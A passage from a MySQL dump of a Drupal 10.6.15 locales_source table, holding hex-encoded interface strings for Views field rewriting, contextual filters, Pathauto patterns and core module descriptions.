(4439, 0x577261707065722048544d4c20656c656d656e74, '', '10.6.15'),
(4440, 0x43686f6f7365207468652048544d4c20656c656d656e7420746f20777261702061726f756e642074686973206669656c6420616e64206c6162656c2c20652e672e2048312c2048322c206574632e2054686973206d6179206e6f74206265207573656420696620746865206669656c6420616e64206c6162656c20617265206e6f742072656e646572656420746f6765746865722c207375636820617320776974682061207461626c652e, '', '10.6.15'),
(4441, 0x4164642064656661756c7420636c6173736573, '', '10.6.15'),
(4442, 0x5573652064656661756c7420566965777320636c617373657320746f206964656e7469667920746865206669656c642c206669656c64206c6162656c20616e64206669656c6420636f6e74656e742e, '', '10.6.15'),
(4443, 0x557365206669656c642074656d706c617465, '', '10.6.15'),
(4444, 0x496620636865636b65642c206669656c642061706920636c61737365732077696c6c206265206164646564206279206669656c642074656d706c617465732e2054686973206973206e6f74207265636f6d6d656e64656420756e6c65737320796f75722043535320646570656e64732075706f6e20746865736520636c61737365732e204966206e6f7420636865636b65642c2074656d706c6174652077696c6c206e6f7420626520757365642e, '', '10.6.15'),
(4445, 0x5374796c652073657474696e6773, '', '10.6.15'),
(4446, 0x4f7665727269646520746865206f7574707574206f662074686973206669656c64207769746820637573746f6d2074657874, '', '10.6.15'),
(4447, 0x546865207465787420746f20646973706c617920666f722074686973206669656c642e20596f75206d617920656e74657220646174612066726f6d20746869732076696577206173207065722074686520225265706c6163656d656e74207061747465726e73222062656c6f772e20596f75206d617920696e636c756465203c6120687265663d2240747769675f646f6373223e547769673c2f613e206f722074686520666f6c6c6f77696e6720616c6c6f7765642048544d4c20746167733a203c636f64653e40746167733c2f636f64653e, '', '10.6.15'),
(4448, 0x4f75747075742074686973206669656c64206173206120637573746f6d206c696e6b, '', '10.6.15'),
(4449, 0x5468652044727570616c2070617468206f72206162736f6c7574652055524c20666f722074686973206c696e6b2e20596f75206d617920656e74657220646174612066726f6d20746869732076696577206173207065722074686520225265706c6163656d656e74207061747465726e73222062656c6f772e, '', '10.6.15'),
(4450, 0x557365206162736f6c7574652070617468, '', '10.6.15'),
(4451, 0x5265706c61636520737061636573207769746820646173686573, '', '10.6.15'),
(4452, 0x45787465726e616c207365727665722055524c, '', '10.6.15'),
(4453, 0x4c696e6b7320746f20616e2065787465726e616c20736572766572207573696e6720612066756c6c2055524c3a20652e672e2027687474703a2f2f7777772e6578616d706c652e636f6d27206f7220277777772e6578616d706c652e636f6d272e, '', '10.6.15'),
(4454, 0x4e6f207472616e73666f726d, '', '10.6.15'),
(4455, 0x4361706974616c697a65206669727374206c6574746572, '', '10.6.15'),
(4456, 0x4361706974616c697a65206561636820776f7264, '', '10.6.15'),
(4457, 0x5472616e73666f726d207468652063617365, '', '10.6.15'),
(4458, 0x5768656e207072696e74696e672055524c2070617468732c20686f7720746f207472616e73666f726d207468652063617365206f66207468652066696c7465722076616c75652e, '', '10.6.15'),
(4459, 0x4c696e6b20636c617373, '', '10.6.15'),
(4460, 0x5468652043535320636c61737320746f206170706c7920746f20746865206c696e6b2e, '', '10.6.15'),
(4461, 0x5465787420746f20706c61636520617320227469746c65222074657874207768696368206d6f73742062726f777365727320646973706c6179206173206120746f6f6c746970207768656e20686f766572696e67206f76657220746865206c696e6b2e, '', '10.6.15'),
(4462, 0x52656c2054657874, '', '10.6.15'),
(4463, 0x496e636c7564652052656c2061747472696275746520666f722075736520696e206c69676874626f7832206f72206f74686572206a617661736372697074207574696c6974792e, '', '10.6.15'),
(4464, 0x416e79207465787420746f20646973706c6179206265666f72652074686973206c696e6b2e20596f75206d617920696e636c7564652048544d4c2e, '', '10.6.15'),
(4465, 0x416e79207465787420746f20646973706c61792061667465722074686973206c696e6b2e20596f75206d617920696e636c7564652048544d4c2e, '', '10.6.15'),
(4466, 0x546172676574, '', '10.6.15'),
(4467, 0x546172676574206f6620746865206c696e6b2c2073756368206173205f626c616e6b2c205f706172656e74206f7220616e20696672616d652773206e616d652e2054686973206669656c6420697320726172656c7920757365642e, '', '10.6.15'),
(4468, 0x5265706c6163656d656e74207061747465726e73, '', '10.6.15'),
(4469, 0x5472696d2074686973206669656c6420746f2061206d6178696d756d206e756d626572206f662063686172616374657273, '', '10.6.15'),
(4470, 0x4d6178696d756d206e756d626572206f662063686172616374657273, '', '10.6.15'),
(4471, 0x5472696d206f6e6c79206f6e206120776f726420626f756e64617279, '', '10.6.15'),
(4472, 0x496620636865636b65642c2074686973206669656c64206265207472696d6d6564206f6e6c79206f6e206120776f726420626f756e646172792e20546869732069732067756172616e7465656420746f20626520746865206d6178696d756d206368617261637465727320737461746564206f72206c6573732e20496620746865726520617265206e6f20776f726420626f756e646172696573207468697320636f756c64207472696d2061206669656c6420746f206e6f7468696e672e, '', '10.6.15'),
(4473, 0x4164642022e280a6222061742074686520656e64206f66207472696d6d65642074657874, '', '10.6.15'),
(4474, 0x416464206120726561642d6d6f7265206c696e6b206966206f7574707574206973207472696d6d6564, '', '10.6.15'),
(4475, 0x596f75206d6179207573652074686520225265706c6163656d656e74207061747465726e73222061626f76652e, '', '10.6.15'),
(4476, 0x4d6f7265206c696e6b2070617468, '', '10.6.15'),
(4477, 0x546869732063616e20626520616e20696e7465726e616c2044727570616c20706174682073756368206173206e6f64652f616464206f7220616e2065787465726e616c2055524c2073756368206173202268747470733a2f2f7777772e64727570616c2e6f7267222e20596f75206d6179207573652074686520225265706c6163656d656e74207061747465726e73222061626f76652e, '', '10.6.15'),
(4478, 0x4669656c642063616e20636f6e7461696e2048544d4c, '', '10.6.15'),
(4479, 0x416e2048544d4c20636f72726563746f722077696c6c2062652072756e20746f20656e737572652048544d4c2074616773206172652070726f7065726c7920636c6f736564206166746572207472696d6d696e672e, '', '10.6.15'),
(4480, 0x53747269702048544d4c2074616773, '', '10.6.15'),
(4481, 0x5072657365727665206365727461696e2074616773, '', '10.6.15'),
(4482, 0x4c6973742074686520746167732074686174206e65656420746f2062652070726573657276656420647572696e672074686520737472697070696e672070726f636573732e206578616d706c65202671756f743b266c743b702667743b20266c743b62722667743b2671756f743b2077686963682077696c6c20707265736572766520616c6c207020616e6420627220656c656d656e7473, '', '10.6.15'),
(4483, 0x52656d6f76652077686974657370616365, '', '10.6.15'),
(4484, 0x436f6e76657274206e65776c696e657320746f2048544d4c20266c743b62722667743b2074616773, '', '10.6.15'),
(4485, 0x4e6f20726573756c74732074657874, '', '10.6.15'),
(4486, 0x50726f76696465207465787420746f20646973706c61792069662074686973206669656c6420636f6e7461696e7320616e20656d70747920726573756c742e20596f75206d617920696e636c7564652048544d4c2e20596f75206d617920656e74657220646174612066726f6d20746869732076696577206173207065722074686520225265706c6163656d656e74207061747465726e732220696e2074686520225265777269746520526573756c7473222073656374696f6e2061626f76652e, '', '10.6.15'),
(4487, 0x436f756e7420746865206e756d626572203020617320656d707479, '', '10.6.15'),
(4488, 0x456e61626c6520746f20646973706c61792074686520226e6f20726573756c747320746578742220696620746865206669656c6420636f6e7461696e7320746865206e756d62657220302e, '', '10.6.15'),
(4489, 0x4869646520696620656d707479, '', '10.6.15'),
(4490, 0x456e61626c6520746f20686964652074686973206669656c6420696620697420697320656d7074792e204e6f7465207468617420746865206669656c64206c6162656c206f722072657772697474656e206f7574707574206d6179207374696c6c20626520646973706c617965642e20546f2068696465206c6162656c732c20636865636b20746865207374796c65206f7220726f77207374796c652073657474696e677320666f7220656d707479206669656c64732e20546f20686964652072657772697474656e20636f6e74656e742c20636865636b2074686520224869646520726577726974696e6720696620656d7074792220636865636b626f782e, '', '10.6.15'),
(4491, 0x4869646520726577726974696e6720696620656d707479, '', '10.6.15'),
(4492, 0x446f206e6f7420646973706c61792072657772697474656e20636f6e74656e742069662074686973206669656c6420697320656d7074792e, '', '10.6.15'),
(4493, 0x6669656c64, '', '10.6.15'),
(4494, 0x54696d65207a6f6e65206f76657272696465, '', '10.6.15'),
(4495, 0x5468652074696d65207a6f6e652073656c656374656420686572652077696c6c20616c776179732062652075736564, '', '10.6.15'),
(4496, 0x43686f6f7365206120666f726d617420666f7220646973706c6179696e672074686520646174652e204265207375726520746f20736574206120666f726d617420617070726f70726961746520666f7220746865206669656c642c20692e652e206f6d697474696e672074696d6520666f722061206669656c642074686174206f6e6c7920686173206120646174652e, '', '10.6.15'),
(4497, 0x4f7574707574207468652055524c2061732074657874, '', '10.6.15'),
(4498, 0x557365206162736f6c757465206c696e6b2028626567696e7320776974682022687474703a2f2f2229, '', '10.6.15'),
(4499, 0x456e61626c652074686973206f7074696f6e20746f206f757470757420616e206162736f6c757465206c696e6b2e20526571756972656420696620796f752077616e7420746f207573652074686520706174682061732061206c696e6b2064657374696e6174696f6e2e, '', '10.6.15'),
(4500, 0x76696577, '', '10.6.15'),
(4501, 0x52656d6f76652074686973206974656d, '', '10.6.15'),
(4502, 0x52656d6f766520407469746c65, '', '10.6.15'),
(4503, 0x5265617272616e6765204074797065, '', '10.6.15'),
(4504, 0x436f6d6d656e74205065726d616c696e6b, '', '10.6.15'),
(4505, 0x46696c65206c696e6b, '', '10.6.15'),
(4506, 0x46696c6520657874656e73696f6e, '', '10.6.15'),
(4507, 0x46696c65204d494d45, '', '10.6.15'),
(4508, 0x6f456d62656420636f6e74656e74, '', '10.6.15'),
(4509, 0x55736572206e616d65, '', '10.6.15'),
(4510, 0x4c696e6b20746f207468652040656e746974795f6c6162656c, '', '10.6.15'),
(4511, 0x4564697420626c6f636b, '', '10.6.15'),
(4512, 0x54686520636f6e74656e7420626c6f636b206c616e677561676520636f64652e, '', '10.6.15'),
(4513, 0x5361766520616e6420636f6e666967757265, '', '10.6.15'),
(4514, 0x537563636573732028407374617475735f636f646529, '', '10.6.15'),
(4515, 0x4163636573732064656e6965642028407374617475735f636f646529, '', '10.6.15'),
(4516, 0x50616765206e6f7420666f756e642028407374617475735f636f646529, '', '10.6.15'),
(4517, 0x526573706f6e736520737461747573, '', '10.6.15'),
(4518, 0x53686f77732074686520626c6f636b206f6e207061676573207769746820616e79206d61746368696e6720726573706f6e7365207374617475732e204966206e6f7468696e6720697320636865636b65642c2074686520626c6f636b2069732073686f776e206f6e20616c6c2070616765732e204f7468657220726573706f6e736520737461747573657320617265206e6f7420757365642e, '', '10.6.15'),
(4519, 0x546865207469746c652069732075736564206173206120746f6f6c20746970207768656e20746865207573657220686f7665727320746865206d6f757365206f7665722074686520696d6167652e, '', '10.6.15'),
(4520, 0x416c6c20646973706c6179732028657863657074206f76657272696464656e29, '', '10.6.15'),
(4521, 0x436f6e66696775726520406d6f64756c65207065726d697373696f6e73, '', '10.6.15'),
(4522, 0x546865207765627369746520656e636f756e746572656420616e20756e6578706563746564206572726f722e2054727920616761696e206c617465722e, '', '10.6.15'),
(4523, 0x546865207765627369746520656e636f756e746572656420616e20756e6578706563746564206572726f722e2054727920616761696e206c617465722e, '', '10.6.15'),
(4524, 0x546865207765627369746520656e636f756e746572656420616e20756e6578706563746564206572726f722e2054727920616761696e206c617465722e, '', '10.6.15'),
(4525, 0x5468697320706167652073686f777320796f7520616c6c20617661696c61626c652061646d696e697374726174696f6e207461736b7320666f722065616368206d6f64756c652e, '', '10.6.15'),
(4526, 0x486f772073686f756c6420746869732076696577206265207374796c6564, '', '10.6.15'),
(4527, 0x496620746865207374796c6520796f752063686f6f7365206861732073657474696e67732c206265207375726520746f20636c69636b207468652073657474696e677320627574746f6e20746861742077696c6c20617070656172206e65787420746f20697420696e2074686520566965772073756d6d6172792e, '', '10.6.15'),
(4528, 0x596f75206d617920616c736f2061646a75737420746865204073657474696e677320666f72207468652063757272656e746c792073656c6563746564207374796c652e, '', '10.6.15'),
(4529, 0x5374796c65206f7074696f6e73, '', '10.6.15'),
(4530, 0x596f75206d617920757365206669656c6420746f6b656e73206173207065722074686520225265706c6163656d656e74207061747465726e7322207573656420696e20225265777269746520746865206f7574707574206f662074686973206669656c642220666f7220616c6c206669656c64732e, '', '10.6.15'),
(4531, 0x4164646974696f6e616c20636c617373657320746f2070726f76696465206f6e206561636820636f6c756d6e2e2053657061726174656420627920612073706163652e, '', '10.6.15'),
(4532, 0x4164646974696f6e616c20636c617373657320746f2070726f76696465206f6e206561636820726f772e2053657061726174656420627920612073706163652e, '', '10.6.15'),
(4533, 0x47726f7570696e67206669656c64204e722e406e756d626572, '', '10.6.15'),
(4534, 0x596f75206d6179206f7074696f6e616c6c7920737065636966792061206669656c6420627920776869636820746f2067726f757020746865207265636f7264732e204c6561766520626c616e6b20746f206e6f742067726f75702e, '', '10.6.15'),
(4535, 0x5573652072656e6465726564206f757470757420746f2067726f757020726f7773, '', '10.6.15'),
(4536, 0x496620656e61626c6564207468652072656e6465726564206f7574707574206f66207468652067726f7570696e67206669656c64206973207573656420746f2067726f75702074686520726f77732e, '', '10.6.15'),
(4537, 0x52656d6f766520746167732066726f6d2072656e6465726564206f7574707574, '', '10.6.15'),
(4538, 0x4e756d626572206f6620636f6c756d6e73, '', '10.6.15'),
(4539, 0x4175746f6d61746963207769647468, '', '10.6.15'),
(4540, 0x546865207769647468206f66206561636820636f6c756d6e2077696c6c2062652063616c63756c61746564206175746f6d61746963616c6c79206261736564206f6e20746865206e756d626572206f6620636f6c756d6e732070726f76696465642e204966206164646974696f6e616c20636c61737365732061726520656e7465726564206f722061207468656d6520696e6a6563747320636c6173736573206261736564206f6e206120677269642073797374656d2c2064697361626c696e672074686973206f7074696f6e206d61792070726f76652062656e6566696369616c2e, '', '10.6.15'),
(4541, 0x486f72697a6f6e74616c20616c69676e6d656e742077696c6c20706c616365206974656d73207374617274696e6720696e20746865207570706572206c65667420616e64206d6f76696e672072696768742e20566572746963616c20616c69676e6d656e742077696c6c20706c616365206974656d73207374617274696e6720696e20746865207570706572206c65667420616e64206d6f76696e6720646f776e2e, '', '10.6.15'),
(4542, 0x44656661756c7420636f6c756d6e20636c6173736573, '', '10.6.15'),
(4543, 0x416464207468652064656661756c7420766965777320636f6c756d6e20636c6173736573206c696b652076696577732d636f6c2c20636f6c2d3120616e6420636c65617266697820746f20746865206f75747075742e20596f752063616e20757365207468697320746f20717569636b6c79207265647563652074686520616d6f756e74206f66206d61726b75702074686520766965772070726f76696465732062792064656661756c742c2061742074686520636f7374206f66206d616b696e67206974206d6f726520646966666963756c7420746f206170706c79204353532e, '', '10.6.15'),
(4544, 0x437573746f6d20636f6c756d6e20636c617373, '', '10.6.15'),
(4545, 0x44656661756c7420726f7720636c6173736573, '', '10.6.15'),
(4546, 0x41646473207468652064656661756c7420766965777320726f7720636c6173736573206c696b652076696577732d726f772c20726f772d3120616e6420636c65617266697820746f20746865206f75747075742e20596f752063616e20757365207468697320746f20717569636b6c79207265647563652074686520616d6f756e74206f66206d61726b75702074686520766965772070726f76696465732062792064656661756c742c2061742074686520636f7374206f66206d616b696e67206974206d6f726520646966666963756c7420746f206170706c79204353532e, '', '10.6.15'),
(4547, 0x437573746f6d20726f7720636c617373, '', '10.6.15'),
(4548, 0x416464206368696c64, '', '10.6.15'),
(4549, 0x4c6561766520626c616e6b20746f20757365207468652074696d65206f6620666f726d207375626d697373696f6e2e, '', '10.6.15'),
(4550, 0x4164642061203c6120687265663d223a75726c223e636f6e74656e7420626c6f636b3c2f613e2e, '', '10.6.15'),
(4551, 0x4564697420636f6e74656e7420626c6f636b20256c6162656c, '', '10.6.15'),
(4552, 0x44656661756c743a2040706c7567696e5f7469746c65, '', '10.6.15'),
(4553, 0x436f6e74656e742049442066726f6d2055524c, '', '10.6.15'),
(4554, 0x40617267756d656e74207469746c65, '', '10.6.15'),
(4555, 0x40617267756d656e7420696e707574, '', '10.6.15'),
(4556, 0x54686520666f6c6c6f77696e67207265706c6163656d656e7420746f6b656e732061726520617661696c61626c6520666f72207468697320617267756d656e742e, '', '10.6.15'),
(4557, 0x5468697320646973706c617920646f6573206e6f742068617665206120736f7572636520666f7220636f6e7465787475616c2066696c746572732c20736f206e6f20636f6e7465787475616c2066696c7465722076616c75652077696c6c20626520617661696c61626c6520756e6c65737320796f752073656c656374202750726f766964652064656661756c74272e, '', '10.6.15'),
(4558, 0x446973706c617920616c6c20726573756c747320666f722074686520737065636966696564206669656c64, '', '10.6.15'),
(4559, 0x50726f766964652064656661756c742076616c7565, '', '10.6.15'),
(4560, 0x4669786564, '', '10.6.15'),
(4561, 0x517565727920706172616d65746572, '', '10.6.15'),
(4562, 0x5261772076616c75652066726f6d2055524c, '', '10.6.15'),
(4563, 0x5461786f6e6f6d79207465726d2049442066726f6d2055524c, '', '10.6.15'),
(4564, 0x557365722049442066726f6d206c6f6767656420696e2075736572, '', '10.6.15'),
(4565, 0x557365722049442066726f6d20726f75746520636f6e74657874, '', '10.6.15'),
(4566, 0x4c6f61642064656661756c742066696c7465722066726f6d207465726d2070616765, '', '10.6.15'),
(4567, 0x4c6f61642064656661756c742066696c7465722066726f6d206e6f646520706167652c2074686174277320676f6f6420666f722072656c61746564207461786f6e6f6d7920626c6f636b73, '', '10.6.15'),
(4568, 0x4c696d6974207465726d7320627920766f636162756c617279, '', '10.6.15'),
(4569, 0x46696c74657220746f206974656d73207468617420736861726520616c6c207465726d73, '', '10.6.15'),
(4570, 0x46696c74657220746f206974656d73207468617420736861726520616e79207465726d, '', '10.6.15'),
(4571, 0x4d756c7469706c652d76616c75652068616e646c696e67, '', '10.6.15'),
(4572, 0x416c736f206c6f6f6b20666f722061206e6f646520616e642075736520746865206e6f646520617574686f72, '', '10.6.15'),
(4573, 0x46697865642076616c7565, '', '10.6.15'),
(4574, 0x54686520717565727920706172616d6574657220746f207573652e, '', '10.6.15'),
(4575, 0x46616c6c6261636b2076616c7565, '', '10.6.15'),
(4576, 0x5468652066616c6c6261636b2076616c756520746f20757365207768656e207468652061626f766520717565727920706172616d65746572206973206e6f742070726573656e742e, '', '10.6.15'),
(4577, 0x414e44, '', '10.6.15'),
(4578, 0x4f52, '', '10.6.15'),
(4579, 0x4d756c7469706c652076616c756573, '', '10.6.15'),
(4580, 0x436f6e6a756e6374696f6e20746f20757365207768656e2068616e646c696e67206d756c7469706c652076616c7565732e20452e672e20223f76616c75655b305d3d612676616c75655b315d3d62222e, '', '10.6.15'),
(4581, 0x5061746820636f6d706f6e656e74, '', '10.6.15'),
(4582, 0x546865206e756d626572696e67207374617274732066726f6d20312c20652e672e206f6e2074686520706167652061646d696e2f7374727563747572652f74797065732c2074686520337264207061746820636f6d706f6e656e7420697320227479706573222e, '', '10.6.15'),
(4583, 0x557365207061746820616c696173, '', '10.6.15'),
(4584, 0x557365207061746820616c69617320696e7374656164206f6620696e7465726e616c20706174682e, '', '10.6.15'),
(4585, 0x486964652076696577, '', '10.6.15'),
(4586, 0x446973706c617920612073756d6d617279, '', '10.6.15'),
(4587, 0x4e756d65726963616c, 'Sort order', '10.6.15'),
(4588, 0x4e756d626572206f66207265636f726473, '', '10.6.15'),
(4589, 0x556e666f726d6174746564, '', '10.6.15'),
(4590, 0x446566696e65207468652062617365207061746820666f72206c696e6b7320696e20746869732073756d6d6172790a2020202020202020766965772c20692e652e20687474703a2f2f6578616d706c652e636f6d2f3c7374726f6e673e796f75725f766965775f706174682f617263686976653c2f7374726f6e673e2e0a2020202020202020446f206e6f7420696e636c75646520626567696e6e696e6720616e6420656e64696e6720666f727761726420736c6173682e20496620746869732076616c75650a2020202020202020697320656d7074792c2076696577732077696c6c2075736520746865206669727374207061746820666f756e6420617320746865206261736520706174682c0a2020202020202020696e207061676520646973706c6179732c206f72202f206966206e6f207061746820636f756c6420626520666f756e642e, '', '10.6.15'),
(4591, 0x446973706c6179207265636f726420636f756e742077697468206c696e6b, '', '10.6.15'),
(4592, 0x4f76657272696465206e756d626572206f66206974656d7320746f20646973706c6179, '', '10.6.15'),
(4593, 0x446973706c6179206974656d7320696e6c696e65, '', '10.6.15'),
(4594, 0x446973706c617920636f6e74656e7473206f6620224e6f20726573756c747320666f756e6422, '', '10.6.15'),
(4595, 0x446973706c617920224163636573732044656e69656422, '', '10.6.15'),
(4596, 0x44656661756c7420616374696f6e73, '', '10.6.15'),
(4597, 0x496620746869732076616c75652069732072656365697665642c207468652066696c7465722077696c6c2062652069676e6f7265643b20692e652c2022616c6c2076616c75657322, '', '10.6.15'),
(4598, 0x4f7665727269646520746865207669657720616e64206f7468657220617267756d656e74207469746c65732e20596f75206d61792075736520547769672073796e74617820696e2074686973206669656c642061732077656c6c206173207468652022617267756d656e74732220616e6420227261775f617267756d656e747322206172726179732e, '', '10.6.15'),
(4599, 0x457863657074696f6e73, '', '10.6.15'),
(4600, 0x5768656e207468652066696c7465722076616c7565206973203c656d3e4e4f543c2f656d3e20617661696c61626c65, '', '10.6.15'),
(4601, 0x50726f76696465207469746c65, '', '10.6.15'),
(4602, 0x4f7665727269646520746865207669657720616e64206f7468657220617267756d656e74207469746c65732e20596f75206d61792075736520547769672073796e74617820696e2074686973206669656c642e, '', '10.6.15'),
(4603, 0x537065636966792076616c69646174696f6e206372697465726961, '', '10.6.15'),
(4604, 0x2d2042617369632076616c69646174696f6e202d, '', '10.6.15'),
(4605, 0x42617365206669656c64206f76657272696465, '', '10.6.15'),
(4606, 0x436f6e74656e74206c616e67756167652073657474696e6773, '', '10.6.15'),
(4607, 0x456e7469747920666f726d20646973706c6179, '', '10.6.15'),
(4608, 0x456e74697479207669657720646973706c6179, '', '10.6.15'),
(4609, 0x4669656c642073746f72616765, '', '10.6.15'),
(4610, 0x4e756d65726963, '', '10.6.15'),
(4611, 0x5365617263682070616765, '', '10.6.15'),
(4612, 0x5461786f6e6f6d79207465726d206e616d65, '', '10.6.15'),
(4613, 0x5461786f6e6f6d7920766f636162756c617279, '', '10.6.15'),
(4614, 0x5465787420656469746f72, '', '10.6.15'),
(4615, 0x56616c696461746f72, '', '10.6.15'),
(4616, 0x4966206e6f6e65206172652073656c65637465642c20616c6c2061726520616c6c6f7765642e, '', '10.6.15'),
(4617, 0x56616c69646174652075736572206861732061636365737320746f2074686520256e616d65, '', '10.6.15'),
(4618, 0x416363657373206f7065726174696f6e20746f20636865636b, '', '10.6.15'),
(4619, 0x5472616e73666f726d2064617368657320696e2055524c20746f2073706163657320696e207465726d206e616d652066696c7465722076616c756573, '', '10.6.15'),
(4620, 0x53696e676c65206e616d65, '', '10.6.15'),
(4621, 0x4f6e65206f72206d6f7265206e616d657320736570617261746564206279202c206f72202b, '', '10.6.15'),
(4622, 0x4d756c7469706c6520617267756d656e7473, '', '10.6.15'),
(4623, 0x52657374726963742075736572206261736564206f6e20726f6c65, '', '10.6.15'),
(4624, 0x526573747269637420746f207468652073656c656374656420726f6c6573, '', '10.6.15'),
(4625, 0x4966206e6f20726f6c6573206172652073656c65637465642c2075736572732066726f6d20616e7920726f6c652077696c6c20626520616c6c6f7765642e, '', '10.6.15'),
(4626, 0x53696e676c65204944, '', '10.6.15'),
(4627, 0x4f6e65206f72206d6f72652049447320736570617261746564206279202c206f72202b, '', '10.6.15'),
(4628, 0x416374696f6e20746f2074616b652069662066696c7465722076616c756520646f6573206e6f742076616c6964617465, '', '10.6.15'),
(4629, 0x5768656e207468652066696c7465722076616c7565203c656d3e49533c2f656d3e20617661696c61626c65206f7220612064656661756c742069732070726f7669646564, '', '10.6.15'),
(4630, 0x416c6c6f77206d756c7469706c652076616c756573, '', '10.6.15'),
(4631, 0x49662073656c65637465642c2075736572732063616e20656e746572206d756c7469706c652076616c75657320696e2074686520666f726d206f6620312b322b332028666f72204f5229206f7220312c322c332028666f7220414e44292e, '', '10.6.15'),
(4632, 0x4578636c756465, '', '10.6.15'),
(4633, 0x49662073656c65637465642c20746865206e756d6265727320656e746572656420666f72207468652066696c7465722077696c6c206265206578636c7564656420726174686572207468616e206c696d6974696e672074686520766965772e, '', '10.6.15'),
(4634, 0x636f6e7465787475616c2066696c746572, '', '10.6.15'),
(4635, 0x446973706c61797320726563656e746c7920616464656420616e64207570646174656420636f6e74656e742e, '', '10.6.15'),
(4636, 0x446973706c61797320616e6e6f756e63656d656e74732066726f6d207468652044727570616c20636f6d6d756e6974792e, '', '10.6.15'),
(4637, 0x416c6c6f77732062616e6e696e67207669736974732066726f6d207370656369666963204950206164647265737365732e, '', '10.6.15'),
(4638, 0x546869732076657273696f6e206973206e6f7420636f6d70617469626c6520776974682044727570616c2040636f72655f76657273696f6e20616e642073686f756c64206265207265706c616365642e, '', '10.6.15'),
(4639, 0x50726f7669646573206164646974696f6e616c207075626c69636174696f6e2073746174657320746861742063616e2062652075736564206279206f74686572206d6f64756c657320746f206d6f64657261746520636f6e74656e742e, '', '10.6.15'),
(4640, 0x50726f766964657320616e20485454502042617369632061757468656e7469636174696f6e2070726f76696465722e, '', '10.6.15'),
(4641, 0x5768656e20656e61626c65642c2074686973206d6f64756c65206578706f73657320616c6c206669656c647320666f7220616c6c20656e74697479207669657720646973706c6179732e205768656e2064697361626c65642c206f6e6c7920656e7469747920747970652062756e646c657320746861742068617665206c61796f7574206275696c64657220656e61626c65642077696c6c2068617665207468656972206669656c6473206578706f7365642e20456e61626c696e672074686973206d6f64756c6520636f756c64207369676e69666963616e746c7920646563726561736520706572666f726d616e6365206f6e20736974657320776974682061206c61726765206e756d626572206f6620656e7469747920747970657320616e642062756e646c65732e, '', '10.6.15'),
(4642, 0x50726f76696465732061206672616d65776f726b20666f72206d6967726174696e67206461746120746f2044727570616c2e, '', '10.6.15'),
(4643, 0x50726f76696465732061206672616d65776f726b20746f206d69677261746520646174612066726f6d2070726576696f75732076657273696f6e73206f662044727570616c20696e746f2074686520736974652e, '', '10.6.15'),
(4644, 0x4e65772061646d696e697374726174696f6e206e617669676174696f6e, '', '10.6.15'),
(4645, 0x50726f7669646573207468652070617373776f726420636865636b696e6720616c676f726974686d20666f722075736572206163636f756e7473206372656174656420776974682044727570616c207072696f7220746f2076657273696f6e2031302e312e302e, '', '10.6.15'),
(4646, 0x50726f76696465732074686520506f737467726553514c206461746162617365206472697665722e, '', '10.6.15'),
(4647, 0x50726f76696465732066756e6374696f6e616c69747920746f206f757470757420726573706f6e7369766520696d61676573207573696e67207468652048544d4c352070696374757265207461672e, '', '10.6.15'),
(4648, 0x50726f76696465732061206672616d65776f726b20666f72206578706f73696e672052455354207265736f75726365732e, '', '10.6.15'),
(4649, 0x50726f76696465732061207365727669636520666f7220636f6e76657274696e67206461746120746f20616e642066726f6d20666f726d6174732073756368206173204a534f4e20616e6420584d4c2e, '', '10.6.15'),
(4650, 0x416c6c6f777320646973636f7665727920616e642072656e646572696e67206f662073656c662d636f6e7461696e656420554920636f6d706f6e656e74732e, '', '10.6.15'),
(4651, 0x50726f7669646573207468652053514c697465206461746162617365206472697665722e, '', '10.6.15'),
(4652, 0x4c6f677320686f77206d616e792074696d657320636f6e74656e74206973207669657765642e, '', '10.6.15'),
(4653, 0x4c6f6773206576656e747320746f20746865207765622073657276657227732073797374656d206c6f672e, '', '10.6.15'),
(4654, 0x50726f7669646573207573657220696e746572666163657320666f7220636f72652073797374656d732e, '', '10.6.15'),
(4655, 0x416c6c6f777320757365727320746f20726567697374657220616e64206c6f6720696e2c20616e64206d616e61676573207573657220726f6c657320616e64207065726d697373696f6e732e, '', '10.6.15'),
(4656, 0x44727570616c20436f7265202840636f72655f726571756972656d656e742920283c7370616e20636c6173733d2261646d696e2d6d697373696e67223e696e636f6d70617469626c6520776974683c2f7370616e3e2076657273696f6e2040636f72655f76657273696f6e29, '', '10.6.15'),
(4657, 0x406d6f64756c655f6e616d6520283c7370616e20636c6173733d2261646d696e2d6d697373696e67223e696e636f6d70617469626c6520776974683c2f7370616e3e20746869732076657273696f6e206f662044727570616c20636f726529, '', '10.6.15'),
(4658, 0x526567756c61726c7920726576696577203c6120687265663d223a75706461746573223e617661696c61626c6520757064617465733c2f613e20616e642075706461746520617320726571756972656420746f206d61696e7461696e20612073656375726520616e642063757272656e7420736974652e20416c776179732072756e20746865203c6120687265663d223a7570646174652d706870223e757064617465207363726970743c2f613e20656163682074696d6520796f752075706461746520736f6674776172652e, '', '10.6.15'),
(4659, 0x5061747465726e, '', '10.6.15'),
(4660, 0x5061747465726e2074797065, '', '10.6.15'),
(4661, 0x436f6e646974696f6e73, '', '10.6.15'),
(4662, 0x4062756e646c655f74797065206973204062756e646c65, '', '10.6.15'),
(4663, 0x5061747465726e73, '', '10.6.15'),
(4664, 0x42756c6b2067656e6572617465, '', '10.6.15'),
(4665, 0x44656c65746520616c6961736573, '', '10.6.15');
INSERT INTO `locales_source` (`lid`, `source`, `context`, `version`) VALUES
(4666, 0x5468697320706167652070726f76696465732061206c697374206f6620616c6c207061747465726e73206f6e20746865207369746520616e6420616c6c6f777320796f7520746f206564697420616e642072656f72646572207468656d2e, '', '10.6.15'),
(4667, 0x41646420506174686175746f207061747465726e, '', '10.6.15'),
(4668, 0x50617468207061747465726e, '', '10.6.15'),
(4669, 0x436865636b20746f2077686963682074797065732074686973207061747465726e2073686f756c64206265206170706c6965642e204c6561766520656d70747920746f20616c6c6f7720616e792e, '', '10.6.15'),
(4670, 0x436865636b20746f207768696368206c616e6775616765732074686973207061747465726e2073686f756c64206265206170706c6965642e204c6561766520656d70747920746f20616c6c6f7720616e792e, '', '10.6.15'),
(4671, 0x412073686f7274206e616d6520746f2068656c7020796f75206964656e746966792074686973207061747465726e20696e20746865207061747465726e73206c6973742e, '', '10.6.15'),
(4672, 0x4564697420256c6162656c, '', '10.6.15'),
(4673, 0x596f75206e65656420746f2073656c6563742061207061747465726e20747970652c207468656e2061207061747465726e20616e642066696c7465722c20616e642061206c6162656c2e204164646974696f6e616c2074797065732063616e20626520656e61626c6564206f6e20746865203c6120687265663d223a73657474696e6773223e53657474696e67733c2f613e20706167652e, '', '10.6.15'),
(4674, 0x5061747465726e20256c6162656c2073617665642e, '', '10.6.15'),
